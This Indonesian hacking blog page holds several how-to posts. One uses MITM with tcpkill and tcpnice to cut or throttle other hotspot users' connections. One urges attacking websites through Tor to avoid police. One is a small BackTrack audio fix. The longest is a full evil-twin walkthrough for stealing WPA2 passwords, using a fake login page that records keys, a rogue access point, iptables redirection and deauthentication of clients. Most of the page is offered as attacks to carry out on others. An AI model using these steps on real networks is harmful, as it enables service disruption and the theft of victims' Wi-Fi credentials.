TCPkill adalah sebuah tools yang dapat digunakan untuk membunuh koneksi tcp hidup (cutting ) ke atau dari, jaringan host port, atau kombinasi dari kedua hal tersebut ..sedangkan TcpNice berguna untuk memperlambat koneksi ip target.

Jengkel di saat hotspotan yang di monopoli oleh host tertentu atau pengguna tertentu memang tidak mengenakan hati .. tapi gk usah kawatir karna w ada jalan keluar nih…

Lankah-Langkah
==============

langkah pertama adalah mengambil alih jaringan router dengan MITM. Nah kita harus mengenable forwarding pada kernel kita.

echo 1 > /proc/sys/net/ipv4/ip _forward

so what next ?

Langkah kedua mari kita liat target yang nakal karena memonopoli bandwidth yang seharusnya merata pada router2 tanpa pembagi bw. Biasanya gara2 buku tab youtube yang banyak ataupun download via tourent , dsb. Ane menyarankan menggunakan tcptrack untuk sniffing jaringan keluar masuk

pada backtrack V kita tidak menemukan paket tools tersebut.. so use apt-get

#apt-get update
#apt-get install tcptrack

setelah terinstall ya coba kita mainkan

#tcptrack -i eth0

wew.. di sana kita tinggal melihat ip2 yang mengambil bandwidth besar.. okey saatnya beraksi sob..

berguna juga untuk menahan serangan DDOS nih …

Langkah ke 3 kita akan menggunakan jurus ampuh pembunuh masal uwkakakaka.. sekarang kita tinggal melakukan perintah

#tcpkill -i eth0 -9 host 192.168.x.x.

[-i] itu ditentukan dgn interface apa yang kita pakai untuk konek ke router .. klo memang ente terhubung dengan hotspot ya tinggal kita menggunakan wlan0 nah

[-9] adalah perintah untuk memakssa (force) kill

[host] adalah perintah yang digunakan utnuk menentukan host mana yang hendak kita ambil dan kita bunuh …wkwkwkkw serem amit kek bunuh ayam aja ..wkowkwokwowkwo cuma bercanda gw .. Tongue

perintah di atas tadi adalah perintah untuk membunuh semua koneksi tcp yang terhubung pada host tersebut .. nah klo kita mau membunuh traffic yang berasal dari port2 tertentu doang kita bisa menggunakan perintah terspesifikasi

pada tcptrack -i eth0 tadi kan kita bisa meluhat port yang terhubung dengan tcp nya …. nah jadi kita bisa memilih2 dengan perintah

# tcpkill -i eth0 -9 host 192.168.x.x and port 4455

perintah tadi akan menutup semua paket keluar masuk pada port 445 .. tapi klo si doi tetep aja berulah .. dan makin mengesalkan mending kita kill seluruhnya .. esmosi mode on

# tcpkill -9 net 192.168.1.x

atau bisa menggunakan

# tcpnice -i eth0 -A host 192.168.x.x

hal tersebut akan membunuh atau memperlambat dgn tcpnice …semua koneksi pada tcp yang terhubung pada router .. beberapa options dalam tools ini dapat kita tentukan sendiri.. coba pelajari aja yak ..Tongue

[Options]
-A Inject TCP tiny window advertisements.
-I Inject ICMP source quench replies.
-M Inject ICMP fragmentation-needed replies with tiny next-hop MTUs.
-i interface to listen on
If no option (A,I,M) is given, all woud be used.

Selasa, 10 April 2012

Hacking anonim(takterdeteksi) dengan Tor

Banyak dari tmn" pasti sering takut klw" pas lagi ngeHack website trus kedetek ipnya n ditangkap deh ma polisi...
nah kali ni ku punya sedikit solusi...pas lagi buka" youtube eh ketemu video tutorial bagus
Semoga dapat
ide tentang bagaimana menggunakan Tor dengan lebih baik.. Ini sangat mudah digunakan ^_^. Seperti yang Anda lihat saya tidak pernah terhubung langsung ke website sasaran ...goodluck ^_^


Rabu, 21 Maret 2012

fix audio error on backtrack 5 R2


klik naga > system > preferences > Startup Applications.
trus add > isi name trserah apa aja > commandnya di browse ke ( file system > usr > bin > cari file pulse audio > klik open.
trus restart..
tapi kalo yg audionya kecil, ke terminal>alsamixer> pake tombol kiri-kanan buat milih n atas-bawah buat besarin suaranya

Senin, 19 Maret 2012

hacking wpa/wpa2 tanpa wordlist/bruteforce

Inti dari trik ini adalah membuat akses point palsu yang di buat serupa mungkin dengan ap target, dengan harapan client akan “salah konek” atau mengkoneksikan dirinya ke akses point yang bukan sebenarnya.Masih ingat metode fakelogin ? yup attacker akan mengkombinasikan serangan ini dengan metode fakelogin yang memiliki kemampuan untuk menyimpan data. Bagaimana attacker melakukannya ? baik kita mulai

1. Mempersiapkan fakelogin AP
Untuk contoh kali ini saya telah mengupload contoh halaman login akses point palsu di ftp.indonesianbacktrack.or.id , teman-teman bisa mendownloadnya di sana.
A. Membuat database
Seperti yang saya jelaskan sebelumnya , ada baiknya kita membuat sebuah database pada localhost kita karena tujuan dari serangan ini adalah membawa client dari AP target mengakses sebuah fakelogin pada localhost kita sehingga client tersebut tertipu dan melakukan authentifikasi di fakelogin tersebut. Database yang saya setting pada fakelogin palsu adalah bernama wpa2 karena itu kita buat database “wpa2″ dan buat table “content” Lebih jelasnya lihat ss di bawah ini.Ok jalankan service daemon mysql terlebih dahulu ,
/etc/init.d/mysql start

B. FakeLogin
Buatlah fakelogin pada localhost kita , unzip file yang telah kita download dari ftp IBTeam tadi kemudian usahakan taruh pada direktori “/” pada service apache, kalau di backtrack atau ubuntu bisa ditempatkan di direktori “/var/www”.
root@eichel:/var/www# ls -al
 total 84
 drwxrwxrwx 6 531 527 4096 2012-03-17 17:21 .
 drwxr-xr-x 15 root root 4096 2011-05-10 22:56 ..
 -rw-r--r-- 1 root root 1035 2011-12-27 19:16 error.html
 -rw-r--r-- 1 root root 1455 2011-12-27 16:23 gradientstrip.gif
 -rw-r--r-- 1 root root 1149 2012-01-04 23:06 index.html
 -rwxrwxrwx 1 531 527 13 2011-03-30 04:45 .lastlogin
 -rw-r--r-- 1 root root 716 2012-03-17 16:51 savekey.php
 -rw-r--r-- 1 root root 892 2012-03-17 16:47 update.html
 -rw-r--r-- 1 root root 651 2011-12-27 17:58 verizon.css
 -rw-r--r-- 1 root root 3195 2011-12-27 16:24 vlogo_blk.gif
Jika sudah jalankan service apache kita “/etc/init.d/apache2 start” kemudian buka localhost atau dengan ip local kita pada browser.

Okey semua yang kita butuhkan sudah siap , kemudian seperti yang sudah saya singgung di atas, attacker akan membuat sebuah AP palsu yang hampir sama dengan AP Target.
2. FakeAP
A. Information Gathering
Metode ini di mulai dari tahap information gathering terhadap AP Target. dimana kita mengambil semua informasi kemudian membuat AP yang sama persis dengan AP target. Ok kita mulai

Percobaan ini saya lakukan pada IBTeam Lab di jakarta, sehingga saya memakai IBTeam AP sebagai target. Gunakan “airodump-ng [interface-monitor]” untuk mengambil informasi AP Target.

B. Dhclient Server
Untuk keperluan membuat fakeAP dengan kemampuan dhcp kita harus menginstall dhclient server di localhost kita, pengguna backtrack dan debian lainnya dapat menginstall service ini dengan apt-get.

Uppz ada keterangan fail disitu .. itu dikarenakan setingan file konfigurasi pada dhcp3-server belum di konfigurasi dengan benar. Baik sebelumnya kita backup terlebih dahulu file konfigurasi default sebelum membuat file konfigurasi yang kita inginkan.
root@eichel:/var/www# mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
Jika sudah kita buat file konfigurasi dengan setingan yang kita kehendaki dengan menggunakan editor kesayangan anda,
root@eichel:/var/www# kwrite /etc/dhcp3/dhcpd.conf
Kemudian isikan seperti contoh di bawah ini, anda dapat menggantinya sesuai kebutuhan konfigurasi IP, DNS, gateway , dll.
ddns-update-style ad-hoc;
 default-lease-time 600;
 max-lease-time 7200;
 subnet 192.168.2.128 netmask 255.255.255.128 {
 option subnet-mask 255.255.255.128;
 option broadcast-address 192.168.2.255;
 option routers 192.168.2.129;
 option domain-name-servers 8.8.8.8;
 range 192.168.2.130 192.168.2.140;
 }
Konfigurasi di atas sebenarnya merupakan konfigurasi IP yang nantinya akan di pakai pada AP palsu kita nantinya. Dan adanya support DHCP agar client bisa mendapatkan ip secara otomatis.
C. Airbase-ng
Ok tahap selanjutnya kita akan membuat FakeAP dengan konfigurasi IP yang sama dengan konfigurasi pada dhcp server yang telah kita buat pada tahap sebelumnya. Namun informasi AP haruslah sama dengan hasil tahap “information gathering” terhadap AP target. kita matikan terlebih dahulu beberapa proses monitor pertama
root@eichel:~# airmon-ng stop mon0
 Interface Chipset Driver
 mon0 Ralink RT2870/3070 rt2800usb - [phy0] (removed)
 wlan1 Ralink 2573 USB rt73usb - [phy2]
 wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
root@eichel:~# airmon-ng stop wlan0
 Interface Chipset Driver
 wlan1 Ralink 2573 USB rt73usb - [phy2]
 wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
 (monitor mode disabled)
Jika sudah sesuai dengan channel AP target ( dalam kasus ini 11 – lihat pada tahap information gathering ) , kita memulai airmon-ng pada channel 11.

Setelah itu kita jalankan airbase-ng untuk memulai FakeAP. ssid dan channel disikan persis sama dengan hasil “information gathering” dengan airodump untuk mengecoh client.
syntaxnya : airbase-ng -e [ssid] -c [channel] -a [bssid] [interface]

Kemudian perhatikan output pada perintah airbase-ng yang telah kita jalankan barusan, nah airbase-ng akan menciptakan sebuah interface baru yaitu “at0″ dimana nantinya interface at0 tersebut yang akan menjadi patokan konfigurasi IP pada fakeap yang sendang kita buat. Karena itu konfigurasikan IP pada at0 sesuai dengan konfigurasi routing pada DNS, netmask, gw ( gateway ) pada file /etc/dhcp3/dhcpd.conf. Kemudian jalankan service dhcp3-server.

3. IPtables
Setelah semuanya berhasil dengan baik, harapan attacker adalah client terkecoh ketika mengakses fakeAP yang telah di buat sebelumnya, maka attacker berharap agar client mengira bahwa authentifikasi pada wpa2 yang diaksesnya berubah menjadi authentifikasi pada browser. yaitu pada index fakelogin yang telah kita siapkan pada server apache/httpd pada localhost kita. Permasalahannya adalah bagaimana client dapat mengakses AP tidak menjadi masalah lagi, tapi bagaimana agar client mengakses localhost kita yang menjadi masalah. Baik kita gunakan iptables untuk meredirect setiap url yang dimasukan client pada browser ( port 80 ) menuju kepada localhost kita. Misalnya client mengakses google.com maka browser akan mengarahkannya terlebih dahulu ke file pada localhost apache kita.
A. Menghapus semua setingan IPtables.
Pertama-tama kita hapus semua setingan iptables pada NAT, chain ,dll
root@eichel:~# iptables --flush
 root@eichel:~# iptables --table nat --flush
 root@eichel:~# iptables --delete-chain
 root@eichel:~# iptables --table nat --delete-chain
B.Lakukan routing untuk membuat interface at0 dapat diselaraskan dengan interface inti ( eth0 )
root@eichel:~# iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
root@eichel:~# iptables –append FORWARD –in-interface at0 -j ACCEPT
Kemudian lanjutkan dengan mengaktifkan ip_forward
root@eichel:~# echo 1 > /proc/sys/net/ipv4/ip_forward
C. Redirect semua permintaan pada port 80
Buatlah sebuah rulles pada iptables agar client akan teredirect pada saat mengakses port 80. Alamat yang digunakan sebagai destination ( tujuan ) tentu saja adalah alamat pada interface kita yang terkoneksi dengan internet.
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
 inet addr:192.168.1.13 Bcast:192.168.1.255 Mask:255.255.255.0
 inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:99424 errors:0 dropped:0 overruns:0 frame:0
 TX packets:92864 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:94380248 (94.3 MB) TX bytes:16195158 (16.1 MB)
 Interrupt:43
Okey seperti ouput di atas agaknya saya menggunakan ip address 192.168.1.13 yang terkonek dengan gateway berbeda dengan akses point target. Hmm jgn bingung dengan hal ini karena ada kemungkinan pada administrasi jaringan sysadmin memakai beragam subnet ip pada tiap2 AP yang terdapat dalam satu jaringan.
root@eichel:~#iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.13:80
root@eichel:~# iptables -t nat -A POSTROUTING -j MASQUERADE
4. Deauthentifikasi
Agar client terkecoh sesuai dengan tujuan kita , tentunya kita harus mematikan terlebih dahulu akses point dan client yang terkonek didalamnya agar client nantinya malah login ke fakeAP. Kita gunakan aireplay-ng , ane rasa masih pada ingat perintah-perintah dasarnya

Perhatikan pada tab terminal airbase-ng
okey ternyata korban memakan pancingan setelah terdeauthentifikasi dari APTarget dan melakukan authentifikasi ke FakeAP

Client Target side
Mari kita mengintip sebentar proses pada client
Client pada percobaan kali ini memakai sistem operasi windows 7 , anggap saja client masih terkonek dengan AP asli , lihat pada gambar di bawah ada 2 AP yang telah terbentuk

Kemudian keadaan koneksi ke AP pada saat serangan deauth

Dan client pada saat client terkoneksi dengan FakeAP maka routing Iptables ternyata berhasil dengan baik

Anggap client terpancing untuk mengisi password wpa


5. Melihat hasil
Kita tinggal melihat pada database yang telah kita buat tadi , kalau client terkecoh kemudian mengisi password maka password akan terecord pada database

Oke sampai disini dulu ya.. semoga nantinya ada tehnik-tehnik lainnya yang bisa saya jabarkan untuk teman-teman ..
sumber : http://technicdynamic.com/2011/12/hacking-wpa-2-key-evil-twin-no-bruteforce/